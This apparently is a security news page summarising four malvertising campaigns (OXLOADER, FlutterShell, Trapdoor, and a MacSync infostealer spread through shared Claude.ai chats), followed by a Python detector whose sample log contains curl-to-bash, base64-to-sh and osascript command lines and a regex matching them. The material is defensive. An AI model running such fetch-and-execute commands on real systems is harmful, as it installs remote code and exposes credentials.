Last updated: July 5, 2026 at 9:01 AM UTC
Tag: malvertising (4 articles)

OXLOADER malvertising poses as Node.js installer to drop an infostealer

Elastic Security Labs detailed OXLOADER, a previously undocumented Windows loader that reaches victims through malicious Google Ads impersonating the Node.js download page and other developer tools. A developer searching for Node.js clicks a sponsored result, lands on a convincing fake site, and runs a script that quietly installs the loader, which then deploys an in-memory infostealer called CastleStealer to harvest credentials and other data. OXLOADER is heavily obfuscated, runs several anti-analysis checks, and skips machines set to Russian or in Russian-aligned regions, pointing to a financially motivated Russian-speaking operator. Google removed the advertiser account, but the technique of buying ads against developer searches remains widespread.

Check
Remind developers and staff not to install tools from sponsored search ads, and check endpoints for unexpected installs that began with a downloaded Node.js or developer-tool installer from a non-official site.
Affected
Developers and technical users who search for tools like Node.js and click sponsored ads leading to fake download sites; the payload is an infostealer that harvests credentials and sensitive data.
Fix
Download developer tools only from official project sites or package managers, use ad-blocking or DNS filtering to cut malvertising, and deploy endpoint detection that flags in-memory loaders and credential-stealing behavior.

FlutterShell macOS backdoor spreads via Google and YouTube ads from verified shell companies - CL-CRI-1089 / TamperedChef adware-to-backdoor

Palo Alto Networks Unit 42 has documented FlutterShell, a Flutter-built macOS backdoor distributed through malicious Google and YouTube ads served by a network of Google-verified shell companies. It is the latest stage of the CL-CRI-1089 cluster and part of the broader TamperedChef / EvilAI campaigns that push trojanized productivity software. The ads lure macOS users in the US, Canada, Australia, France, and Germany into installing fake desktop apps. Beyond adware, FlutterShell supports arbitrary shell-command execution, file-system manipulation, and environment-variable exfiltration, and on launch modifies Chrome config files to force browser traffic through an attacker-controlled intermediary. Activity was seen as recently as March 2026.

Check
Warn macOS users that Google/YouTube ads for productivity apps may be malicious. Hunt for Flutter-built apps that modify Chrome config files. Apply Unit 42 IoCs.
Affected
macOS users in the US, Canada, Australia, France, and Germany lured by malvertised fake desktop apps. FlutterShell adds backdoor command execution and Chrome-hijacking on top of adware.
Fix
Source software only from official vendor sites, not search ads. Apply Unit 42 IoCs and block the ad domains. Restore Chrome config on affected Macs and remove the apps.

Trapdoor Android ad fraud: 455 apps, 24M downloads, 659M daily bid requests, selective activation via attribution tools

HUMAN Security has detailed Trapdoor, an Android ad-fraud and malvertising operation that pushed 455 apps with more than 24 million combined Play Store downloads and drove an average of 659 million daily ad-bid requests, three-quarters of them from US devices. The operators run their own ad campaigns to recruit victims, then use legitimate install-attribution tools to switch on fraud only for users who came in through those campaigns, suppressing the bad behavior for anyone who installed organically - which kept Google's reviewers and most security researchers in the dark. Google has now removed all identified apps from the Play Store.

Check
Use MDM to inventory any Trapdoor app from HUMAN's published list on managed Android devices. Look for outbound traffic to HTML5 cashout domains in your DNS logs.
Affected
Android users who downloaded Trapdoor apps after clicking attribution-tagged ads. The campaign is invisible to users who installed the same apps organically.
Fix
MDM-uninstall the named apps and block their package IDs. Restrict Android sideloading on managed devices. Review attribution-provider settings to limit click campaigns' ability to trigger malicious behavior.

Mac malware campaign uses Google ads and 'Apple Support' Claude.ai chats to install infostealer

Hackers are buying Google ads that look like they go to claude.ai - and they do go to a real claude.ai page. But the page is a shared Claude chat dressed up as 'Apple Support' walking users through installing Claude on a Mac. The instructions tell people to paste a command into Terminal that quietly downloads MacSync, a Mac infostealer that grabs saved browser passwords, cookies, and the contents of the macOS Keychain (where macOS stores logins and keys). Because both the ad and the page are real claude.ai links, there is no fake domain to spot. Researcher Berk Albayrak first reported the campaign; BleepingComputer found a second active variant.

Check
Check macOS endpoint logs for Terminal executions of curl or base64 piped to bash in the last 7 days, and review who clicked sponsored Google results for 'Claude mac download'.
Affected
macOS users who searched Google for 'Claude mac download' or similar terms and ran a Terminal command from a shared Claude.ai chat attributed to 'Apple Support'. Two payload variants seen: a MacSync infostealer that exfiltrates Keychain and browser secrets, and a polymorphic in-memory shell payload that profiles the host and delivers a second stage via osascript.
Fix
Rotate browser-saved passwords and macOS Keychain credentials for any user who may have run the malicious command. Sign out and re-authenticate browser sessions to invalidate stolen cookies. Block the indicator domains customroofingcontractors[.]com and bernasibutuwqu2[.]com at network egress. Reinforce with users that they should never install software from chat or terminal instructions - only from official vendor download pages.
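The endpoint check described above (curl or base64 piped into a shell in the last 7 days, plus osascript launched as a second stage) as a worked detector. This is an added example, not code from the page or from the researchers cited; the process-event log format and the sample lines are constructed for illustration, and the domains in them are placeholders.

```python
import re
from datetime import datetime, timedelta, timezone

# Constructed sample lines in a hypothetical process-event format
# ("<UTC time> uid=<n> parent=<parent process> cmd=<command line>"); not real telemetry.
SAMPLE_LOG = """\
2026-06-20T09:00:00Z uid=501 parent=Terminal cmd=curl -fsSL https://old.invalid/x | bash
2026-06-30T10:14:02Z uid=501 parent=Terminal cmd=ls -la ~/Downloads
2026-06-30T10:15:47Z uid=501 parent=Terminal cmd=curl -fsSL https://dl.example.invalid/setup | bash
2026-06-30T10:16:03Z uid=501 parent=Terminal cmd=echo aGVsbG8= | base64 -d | sh
2026-06-30T10:16:10Z uid=501 parent=bash cmd=osascript -e 'do shell script "id"'
2026-06-30T11:02:11Z uid=501 parent=Terminal cmd=brew install node
2026-06-30T11:05:00Z uid=501 parent=Terminal cmd=curl -O https://nodejs.org/dist/node.pkg
"""

LINE_RE = re.compile(r"^(?P<ts>\S+) uid=(?P<uid>\d+) parent=(?P<parent>\S+) cmd=(?P<cmd>.*)$")
# A download or decode stage whose output is piped (possibly via further pipes) into an interpreter.
PIPE_TO_INTERP = re.compile(r"\b(curl|wget|base64)\b[^|]*\|\s*(?:[^|]*\|\s*)*(bash|sh|zsh|osascript)\b")
SHELLS = {"bash", "sh", "zsh"}

def parse_ts(s):
    return datetime.strptime(s, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)

def parse_line(line):
    m = LINE_RE.match(line)
    return m.groupdict() if m else None

def classify(event):
    """Return a verdict string for a suspicious event, or None for benign ones."""
    cmd = event["cmd"]
    if PIPE_TO_INTERP.search(cmd):
        return "high: download/decode output piped into an interpreter"
    if cmd.startswith("osascript") and event["parent"] in SHELLS:
        return "medium: osascript spawned by a shell (possible second-stage delivery)"
    return None  # plain downloads such as "curl -O" and package-manager installs are not flagged

def find_suspicious(log_text, now_iso, days=7):
    """Scan process events newer than `days` before `now_iso`; return (timestamp, verdict, cmd) hits."""
    cutoff = parse_ts(now_iso) - timedelta(days=days)
    hits = []
    for line in log_text.splitlines():
        ev = parse_line(line)
        if ev is None or parse_ts(ev["ts"]) < cutoff:
            continue
        verdict = classify(ev)
        if verdict:
            hits.append((ev["ts"], verdict, ev["cmd"]))
    return hits

if __name__ == "__main__":
    for ts, verdict, cmd in find_suspicious(SAMPLE_LOG, "2026-07-01T00:00:00Z"):
        print(ts, verdict, cmd)
```

On a real fleet the same classification would be fed from EDR process telemetry or shell history rather than the constructed log; the legitimate `curl -O` download of the Node.js package is deliberately left unflagged so the rule targets the download-and-execute pattern, not curl itself.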